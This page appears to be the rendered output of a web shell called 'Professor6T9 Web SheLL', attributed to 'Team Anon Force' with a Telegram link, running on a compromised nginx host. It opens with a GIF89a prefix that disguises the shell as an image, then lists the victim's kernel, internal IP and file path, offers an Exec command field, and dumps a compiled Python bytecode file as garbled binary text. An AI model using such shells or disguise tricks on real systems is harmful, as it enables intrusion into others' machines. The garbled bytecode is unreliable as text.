GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux SamCT211 4.4.302+ #86009 SMP Wed Nov 26 18:19:20 CST 2025 x86_64
nginx/1.23.1
192.168.4.211
/
volume1
/
@appstore
/
Python3.9
/
usr
/
lib
/
python3.9
/
idlelib
/
__pycache__
[ HOME ]
Exec
Submit
File Name : autocomplete.cpython-39.opt-1.pyc
a h�# � @ s� d Z ddlZddlZddlZddlZddlZd\ZZddlm Z ddl mZ ddlm Z dZdZd d d efZd d d efZejej d Zej� ejr�ejnd� �Zde� �ZG d d� d�Ze�� edkr�ddlmZ eddd� dS )z�Complete either attribute names or file names. Either on demand or after a user-selected delay after a key character, pop up a list of candidates. � N)r � )�autocomplete_w)�idleConf)�HyperParser)TFTN)FTTNF�_� �.c @ sn e Zd Zddd�Zedd� �Zdd� Zddd �Zd d� Zdd � Z ddd�Z dd� Zdd� Zdd� Z dd� ZdS )�AutoCompleteNc C s, || _ |d ur|j| _d | _d | _d | _d S �N)�editwin�text�autocompletewindow�_delayed_completion_id�_delayed_completion_index)�selfr � r �7/tmp/_install/usr/lib/python3.9/idlelib/autocomplete.py�__init__"